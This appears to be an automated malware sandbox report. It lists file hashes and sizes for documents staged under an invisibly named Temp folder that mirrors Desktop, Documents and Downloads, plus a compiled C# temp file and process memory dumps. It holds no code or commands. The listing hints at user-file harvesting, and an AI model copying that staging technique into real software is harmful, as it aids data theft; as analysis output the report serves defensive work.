C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Desktop\StartSkip.xlsx

Filesize
11KB

MD5
157a35b75a347196adb14617cde81cb4

SHA1
e7fcac0e87c91d1b028327f6715fea6d9ff4b970

SHA256
dce63f6c6b797cb82a1016f7cc18d078c8c0b28fe857c42b080031a422ca295c

SHA512
e4f41aea0b4e80f66800a5dbe75a909a04ea29538e7974e9765dd6ce27163afe1c2f91b483714e3b96beb323f8d67124bbbddcf19e6d663253b5572ffb3debb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Desktop\UnblockRedo.docx

Filesize
19KB

MD5
d5a6f1985c7153fed22c05fe5e478075

SHA1
18602c6b57d0b7da5ee5e105ce6098f7cff0b7e6

SHA256
424eee176d1f8dbc09cc85eecd5e8b965c8e344baf40923d103359611a10291e

SHA512
a04f5172ceecf2d7309933835462dc7f82e7aaf296c47bd09227bd3b09fa07013a7c4271660a44a18a63c23ff4219bcf9e31bcd9ec4cef93f7a7a0c3dc5b2746

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\CompareInvoke.xls

Filesize
1.3MB

MD5
abc84c116f165ad9ee5d57fba24bef51

SHA1
11cf432ebf68ad943523234531b2732e8d9969dc

SHA256
bc9e7da836386e253bd4076fe9916e38dcad237e6be8e3d2e4cb6cefc055c0aa

SHA512
f6c03511aff448dcfe83e9ca2249aa7a9ca1934dc091a3db53b495d201b49474e39b197e0e28e85a7e026ebe70f4de22ec1527ed0e225bd662ddfd5153f356a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\InvokeSubmit.xlsx

Filesize
10KB

MD5
2ed1e2dcc9133ea4fabe352a551a7b2c

SHA1
f0f3ebb21e0d49a051886e486221c2e72ea2b1c3

SHA256
ba4c0a1288b110c93abaaf81ccfca6ce801e75b3288f9ed5b7e091d4b5306f86

SHA512
ec6a792cedf75c1fd88bef0434cc566025783634ec0edafc556d47b32da9885e3173e639fcd079a6c8ba29bd09ededfdafae2652a62747e24f44748feb96c241

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\NewPing.csv

Filesize
1.2MB

MD5
6be4a80bec51647d426b696d8bac3d24

SHA1
99a880b37412a082dd3df074d9e4a3fc10c13b1b

SHA256
932e760bf04bf15b54a28b98b6e0b9e557246d56ca918070186df9f105baf486

SHA512
9bd15a0fc571c8d833362e419d05aa2ec27d08a5b24ee5a86d1b31051bb78b19c3ba03b4037d829f1cc90bcc26cc38a4fddcf4f5079e870acbc0f41f7a601e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\RegisterExpand.xlsx

Filesize
11KB

MD5
21c849222ee0da4a2963fb7c2a4611ad

SHA1
f0b85057679d3907baff9599f6715448e18bbef2

SHA256
c0fd2438237afd600d8a34ebe8158fe9ee47a95bd3e718e6838f92bfa4a6f2bc

SHA512
0d91b20cdfb22a571f13106485dd17f83e7829186477e97e7ba36b6bb32cd8b11895921afb68864e527066a61bea6102a798c21c0b2611f526630e1b0d45a36a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\RepairUninstall.xlsx

Filesize
9KB

MD5
3e3fcbfc5ef43ac96615e4508f69b756

SHA1
7b5038f418841a25d8b6ae92ba24d6804a9018fe

SHA256
0254fe7d264be64659abe8efe1ac84eec3337ffd2c1145b166b646cbeb2b2d4f

SHA512
c8467e38cad94ee865121da7478571cbe6fa9eb901cb3b079940f6870347b6733b75bc8e97c557860070e8d5778574131334d0313dc93899287376f032072149

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Documents\UnprotectBackup.csv

Filesize
1.6MB

MD5
7a3faa8e132bb915b72d434d7c353a99

SHA1
e7dce13d646310241597c4ccc8aafb33ad5e4cee

SHA256
f5434aa2bb71776722b073d77bc5b85b521c6309456c1211fb174d05158cd726

SHA512
3b3f5371b741e5a4076401df66f188a080d26cc35467e08d3e999388ec614621f1ecae77e5d75dd15ff6cbefdce4d23434dd12ab8d1d31c5f338f0e84e299012

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Downloads\ApproveStep.doc

Filesize
394KB

MD5
18839bf93da0b3c924dbf1bf31e6df1c

SHA1
da2f579382d9d020a5432425b5d0ef3bc59408bd

SHA256
f595dd9a8b8db94af5b7cd84a2bb1330d0576ecab8e57833f13f99242fb78046

SHA512
e35033204053b02add3db426b7ee77a643d2b048d5884cbc675d9dacdc64aceae024a1600b08673da48f8b09d7ffd10498a6fc16680b32e685c67fa714a14cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎‌ ‎ ‍\Common Files\Downloads\CheckpointAdd.jpeg

Filesize
1.0MB

MD5
a186ff734d840d5a91ba1081e9d33d2e

SHA1
b094d9465897a416a9dd9a873ef3cab434a1550d

SHA256
bc55b18954ca53d05fa215a306ad5058b0ff12e17185e64dd593297c58ffa595

SHA512
23f73f753022afcb946d44a050f9f74c27c3cf93f83de665c0cf920750e123fc3fbcdcebd74ac40b1d0de5dcbc877c151f6219e766eaa75c641042b0b621b7a4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\25vcnirf\25vcnirf.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\25vcnirf\25vcnirf.cmdline

Filesize
607B

MD5
ad62a39352ee7f4a9833306e6cc4e053

SHA1
e648bff435d9a06fe131b13afd4a678804799f6d

SHA256
9e2f5b646e1e19bbc10616352f5e3a277a5bc2e4223861f75d8c67d97c140914

SHA512
9d8324377299b8db3abb2702dc7aa9ac51ca6b0ec5e1ae7b0da07c715baeac66bf9c825eb098a1b40b8f1f7056fff657790c971e335cb71e7e8529c6c04f3e5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\25vcnirf\CSCC149DB8C238E42BA88E9D3D3B52B9269.TMP

Filesize
652B

MD5
b2b0111ad918e8f452adaaa5414b7fff

SHA1
5f2b583747a8577d967fec37ebb4b98d861e0ff3

SHA256
14b40fd6e871d72c1c5b892f96543da1b8261396651065ceb0d628aa391fb97f

SHA512
c2b6f3d4ec84ef969deb8f8db821d5611e1e1b903e6718aa644f3a5fb9a8a9d094d9ab700f24724de5f97c111b9829c11464205d413d0596729cc6e9a8937862

Download Submit
memory/596-60-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp

Filesize
1.4MB

Download
memory/596-350-0x00007FFE017C0000-0x00007FFE017CD000-memory.dmp

Filesize
52KB

Download
memory/596-337-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp

Filesize
4.4MB

Download
memory/596-82-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp

Filesize
124KB

Download
memory/596-58-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp

Filesize
124KB

Download
memory/596-85-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp

Filesize
1.4MB

Download
memory/596-76-0x00007FFE00F30000-0x00007FFE00F44000-memory.dmp

Filesize
80KB

Download
memory/596-78-0x00007FFE017C0000-0x00007FFE017CD000-memory.dmp

Filesize
52KB

Download
memory/596-338-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp

Filesize
144KB

Download
memory/596-80-0x00007FFE06670000-0x00007FFE06689000-memory.dmp

Filesize
100KB

Download
memory/596-339-0x00007FFE0AAF0000-0x00007FFE0AAFF000-memory.dmp

Filesize
60KB

Download
memory/596-81-0x00007FFE00300000-0x00007FFE00418000-memory.dmp

Filesize
1.1MB

Download
memory/596-254-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp

Filesize
184KB

Download
memory/596-74-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp

Filesize
144KB

Download
memory/596-267-0x000002096D530000-0x000002096D8A5000-memory.dmp

Filesize
3.5MB

Download
memory/596-56-0x00007FFE06670000-0x00007FFE06689000-memory.dmp

Filesize
100KB

Download
memory/596-73-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp

Filesize
3.5MB

Download
memory/596-70-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp

Filesize
4.4MB

Download
memory/596-71-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp

Filesize
736KB

Download
memory/596-72-0x000002096D530000-0x000002096D8A5000-memory.dmp

Filesize
3.5MB

Download
memory/596-66-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp

Filesize
184KB

Download
memory/596-64-0x00007FFE04D60000-0x00007FFE04D6D000-memory.dmp

Filesize
52KB

Download
memory/596-62-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp

Filesize
100KB

Download
memory/596-278-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp

Filesize
3.5MB

Download
memory/596-340-0x00007FFE04DB0000-0x00007FFE04DDD000-memory.dmp

Filesize
180KB

Download
memory/596-341-0x00007FFE06670000-0x00007FFE06689000-memory.dmp

Filesize
100KB

Download
memory/596-266-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp

Filesize
736KB

Download
memory/596-54-0x00007FFE04DB0000-0x00007FFE04DDD000-memory.dmp

Filesize
180KB

Download
memory/596-41-0x00007FFE0AAF0000-0x00007FFE0AAFF000-memory.dmp

Filesize
60KB

Download
memory/596-30-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp

Filesize
144KB

Download
memory/596-25-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp

Filesize
4.4MB

Download
memory/596-312-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp

Filesize
124KB

Download
memory/596-308-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp

Filesize
144KB

Download
memory/596-313-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp

Filesize
1.4MB

Download
memory/596-307-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp

Filesize
4.4MB

Download
memory/596-351-0x00007FFE00300000-0x00007FFE00418000-memory.dmp

Filesize
1.1MB

Download
memory/596-352-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp

Filesize
3.5MB

Download
memory/596-168-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp

Filesize
100KB

Download
memory/596-349-0x00007FFE00F30000-0x00007FFE00F44000-memory.dmp

Filesize
80KB

Download
memory/596-347-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp

Filesize
736KB

Download
memory/596-346-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp

Filesize
184KB

Download
memory/596-345-0x00007FFE04D60000-0x00007FFE04D6D000-memory.dmp

Filesize
52KB

Download
memory/596-344-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp

Filesize
100KB

Download
memory/596-343-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp

Filesize
1.4MB

Download
memory/596-342-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp

Filesize
124KB

Download
memory/1192-83-0x00007FFDF10C3000-0x00007FFDF10C5000-memory.dmp

Filesize
8KB

Download
memory/1192-84-0x00007FFDF10C0000-0x00007FFDF1B81000-memory.dmp

Filesize
10.8MB

Download
memory/1192-205-0x00007FFDF10C0000-0x00007FFDF1B81000-memory.dmp

Filesize
10.8MB

Download
memory/1192-91-0x0000023A6C840000-0x0000023A6C862000-memory.dmp

Filesize
136KB

Download
memory/2156-203-0x00000121C53C0000-0x00000121C53C8000-memory.dmp

Filesize
32KB

Download